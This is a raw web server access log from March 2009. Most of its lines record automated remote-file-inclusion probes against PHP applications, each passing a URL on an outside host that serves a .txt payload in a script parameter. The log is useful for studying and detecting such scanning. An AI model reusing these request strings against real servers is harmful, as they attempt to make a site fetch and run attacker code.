218.246.20.221 - - [24/Mar/2009:15:40:48 -0500] "GET /logs/access_log.1235865600//admin/classes/TplLoad.php?full_path_to_public_program=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.246.20.221 - - [24/Mar/2009:15:40:49 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.246.20.221 - - [24/Mar/2009:15:40:59 -0500] "GET /logs/access_log.1236124800//admin/classes/TplLoad.php?full_path_to_public_program=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:15:54:05 -0500] "GET /logs//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:15:54:05 -0500] "GET /logs/access_log.1228694400//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:15:54:05 -0500] "GET //errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:15:54:08 -0500] "GET /logs/access_log.1228521600//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.200.242.34 - - [24/Mar/2009:15:56:07 -0500] "GET /?wpPATH=http://www.yourlist.us/peel/re/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
216.157.27.59 - - [24/Mar/2009:15:56:21 -0500] "GET /?wpPATH=http://kappaltda.com/style/r57/test.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
216.157.27.59 - - [24/Mar/2009:15:56:29 -0500] "GET /logs/?wpPATH=http://kappaltda.com/style/r57/test.txt?? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
85.237.201.58 - - [24/Mar/2009:15:57:20 -0500] "GET /logs/?wpPATH=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 200 182826 "-""libwww-perl/5.803"
85.237.201.58 - - [24/Mar/2009:15:57:21 -0500] "GET /?wpPATH=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
85.237.201.58 - - [24/Mar/2009:15:57:22 -0500] "GET /logs/?wpPATH=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 200 182826 "-""libwww-perl/5.803"
85.237.201.58 - - [24/Mar/2009:15:57:22 -0500] "GET /?wpPATH=http://lanaalaadi.com/lana/data/tmp/cache/db.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
85.25.94.44 - - [24/Mar/2009:15:59:42 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:15:59:42 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.60.196 - - [24/Mar/2009:16:10:35 -0500] "GET /logs/access_log.1228262400 HTTP/1.0" 200 12042 "http://search.yahoo.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; yplus 4.1.00b)"
58.226.23.55 - - [24/Mar/2009:16:10:54 -0500] "GET /logs//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:16:10:54 -0500] "GET //errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:16:10:55 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.226.23.55 - - [24/Mar/2009:16:11:08 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
83.64.132.254 - - [24/Mar/2009:16:27:37 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:27:37 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:28:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:28:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:29:02 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:29:02 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:29:11 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:29:52 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:29:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:31:29 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:31:30 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
61.109.245.39 - - [24/Mar/2009:16:33:02 -0500] "GET //appserv/main.php?appserv_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
61.109.245.39 - - [24/Mar/2009:16:33:02 -0500] "GET /logs//appserv/main.php?appserv_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
61.109.245.39 - - [24/Mar/2009:16:33:02 -0500] "GET /logs/access_log.1231200000//appserv/main.php?appserv_root=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.106.254.18 - - [24/Mar/2009:16:38:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.106.254.18 - - [24/Mar/2009:16:38:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.106.254.18 - - [24/Mar/2009:16:38:52 -0500] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.106.254.18 - - [24/Mar/2009:16:39:36 -0500] "GET /logs/access_log.1234137600//include/admin.lib.inc.php?site_path=http://www.adresar.de/include/idoff1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:16:40:53 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:16:40:53 -0500] "GET /logs/access_log.1236124800//Neos_Chronos/header.php?base_folder=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:16:40:53 -0500] "GET /logs/access_log.1235952000//Neos_Chronos/header.php?base_folder=http://gumansin.com/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
85.25.94.44 - - [24/Mar/2009:16:40:53 -0500] "GET //Neos_Chronos/header.php?base_folder=http://gumansin.com/id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
208.80.195.122 - - [24/Mar/2009:16:50:50 -0500] "GET / HTTP/1.0" 200 3233 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Q312461; Cox High Speed Internet Customer; (R1 1.5); IEMB3; IEMB3)"
83.64.132.254 - - [24/Mar/2009:16:55:52 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:55:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:55:52 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:55:52 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:56:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:56:28 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:56:31 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:56:31 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:57:10 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:57:10 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:57:11 -0500] "GET /modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.76"
83.64.132.254 - - [24/Mar/2009:16:57:14 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://roadone.net//board//data/photo/db/id.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.76"
164.77.114.237 - - [24/Mar/2009:16:57:52 -0500] "GET /send_reminders.php?includedir=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
164.77.114.237 - - [24/Mar/2009:16:57:52 -0500] "GET /logs/send_reminders.php?includedir=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
164.77.114.237 - - [24/Mar/2009:16:57:52 -0500] "GET /logs/access_log.1235433600/send_reminders.php?includedir=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
164.77.114.237 - - [24/Mar/2009:16:58:00 -0500] "GET /logs/access_log.1233792000/send_reminders.php?includedir=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
117.110.220.66 - - [24/Mar/2009:17:02:27 -0500] "GET //?view=page&pagename=http://roadone.net//board/data/photo/images/idoff1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
117.110.220.66 - - [24/Mar/2009:17:02:28 -0500] "GET /logs/access_log.1233792000//?view=page&pagename=http://roadone.net//board/data/photo/images/idoff1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
117.110.220.66 - - [24/Mar/2009:17:02:34 -0500] "GET /logs//?view=page&pagename=http://roadone.net//board/data/photo/images/idoff1.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
117.110.220.66 - - [24/Mar/2009:17:02:34 -0500] "GET /logs/access_log.1235952000//?view=page&pagename=http://roadone.net//board/data/photo/images/idoff1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
164.77.114.237 - - [24/Mar/2009:17:04:12 -0500] "GET /logs/access_log.1233705600/send_reminders.php?includedir=http://www.ssalkong.com/bbs/data/humor/copyright.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.208.131 - - [24/Mar/2009:17:09:02 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.12.13.152 - - [24/Mar/2009:17:15:44 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:17:15:44 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:17:15:44 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:17:16:29 -0500] "GET /e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:17:16:29 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
81.12.13.152 - - [24/Mar/2009:17:16:29 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://vampires-fifa-liga.de/twomichael/admin/config/htaccess.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
162.39.119.102 - - [24/Mar/2009:17:32:13 -0500] "GET /logs//poll/admin/common.inc.php?base_path=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
162.39.119.102 - - [24/Mar/2009:17:32:14 -0500] "GET //poll/admin/common.inc.php?base_path=http://reav1985.altervista.org/idv6.txt???? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
75.101.164.18 - - [24/Mar/2009:17:38:26 -0500] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
75.101.164.18 - - [24/Mar/2009:17:38:40 -0500] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
64.34.162.200 - - [24/Mar/2009:17:48:35 -0500] "GET /logs//tools/send_reminders.php?includedir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
64.34.162.200 - - [24/Mar/2009:17:48:35 -0500] "GET //tools/send_reminders.php?includedir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
81.12.13.152 - - [24/Mar/2009:17:49:46 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/idmn.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
81.12.13.152 - - [24/Mar/2009:17:49:47 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/idmn.txt? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
81.12.13.152 - - [24/Mar/2009:17:49:51 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/idmn.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
81.12.13.152 - - [24/Mar/2009:17:49:51 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.dwno.or.kr/bbs/idmn.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.34.162.200 - - [24/Mar/2009:17:51:14 -0500] "GET //tools/send_reminders.php?includedir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
64.34.162.200 - - [24/Mar/2009:17:51:14 -0500] "GET /logs//tools/send_reminders.php?includedir=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
218.38.18.236 - - [24/Mar/2009:17:51:39 -0500] "GET /logs/access_log.1230768000//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.18.236 - - [24/Mar/2009:17:51:39 -0500] "GET /logs//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
218.38.18.236 - - [24/Mar/2009:17:51:39 -0500] "GET //tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.18.236 - - [24/Mar/2009:17:52:26 -0500] "GET /logs/access_log.1232582400//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
75.101.164.18 - - [24/Mar/2009:17:53:04 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.808"
75.101.164.18 - - [24/Mar/2009:17:53:12 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
218.38.18.236 - - [24/Mar/2009:17:53:12 -0500] "GET //tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.38.18.236 - - [24/Mar/2009:17:53:12 -0500] "GET /logs/access_log.1230768000//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
218.38.18.236 - - [24/Mar/2009:17:53:12 -0500] "GET /logs//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.109.245.39 - - [24/Mar/2009:17:53:19 -0500] "GET //tools/send_reminders.php?includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
61.109.245.39 - - [24/Mar/2009:17:53:19 -0500] "GET /logs//tools/send_reminders.php?includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.109.245.39 - - [24/Mar/2009:17:53:19 -0500] "GET /logs/access_log.1230768000//tools/send_reminders.php?includedir=http://gumansin.com/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
75.101.164.18 - - [24/Mar/2009:17:53:21 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.808"
75.101.164.18 - - [24/Mar/2009:17:53:22 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.808"
218.38.18.236 - - [24/Mar/2009:17:55:14 -0500] "GET /logs/access_log.1232582400//tools/send_reminders.php?includedir=http://okto.co.kr//zboard/include/idxx.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.193.225.191 - - [24/Mar/2009:17:56:32 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:56:32 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:56:32 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:56:32 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
78.111.71.6 - - [24/Mar/2009:17:57:21 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:21 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:22 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:22 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:23 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:23 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:23 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:24 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:24 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:24 -0500] "GET /logs/errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:24 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:24 -0500] "GET /errors.php?error=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:53 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:57:53 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:03 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:03 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:03 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:04 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:13 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:14 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
78.111.71.6 - - [24/Mar/2009:17:58:19 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://newsletter.security-zone.info//temp/images/Albid.txt? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
218.246.20.221 - - [24/Mar/2009:17:58:21 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
218.246.20.221 - - [24/Mar/2009:17:58:21 -0500] "GET /e404.php?DOCUMENT_ROOT=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
218.246.20.221 - - [24/Mar/2009:17:58:21 -0500] "GET /logs/access_log.1235952000/e404.php?DOCUMENT_ROOT=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
62.193.225.191 - - [24/Mar/2009:17:59:23 -0500] "GET /logs/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:59:23 -0500] "GET /errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:59:28 -0500] "GET /logs/errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
62.193.225.191 - - [24/Mar/2009:17:59:28 -0500] "GET /errors.php?error=http://www.leine-allstars.com//components/AreaRfiid.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
218.246.20.221 - - [24/Mar/2009:17:59:56 -0500] "GET /logs/access_log.1235692800/e404.php?DOCUMENT_ROOT=http://philippinetribunal.org/language/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
124.0.73.2 - - [24/Mar/2009:18:00:00 -0500] "GET /logs/errors.php?error=http://vietnamwingchun.com//fastidioid.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
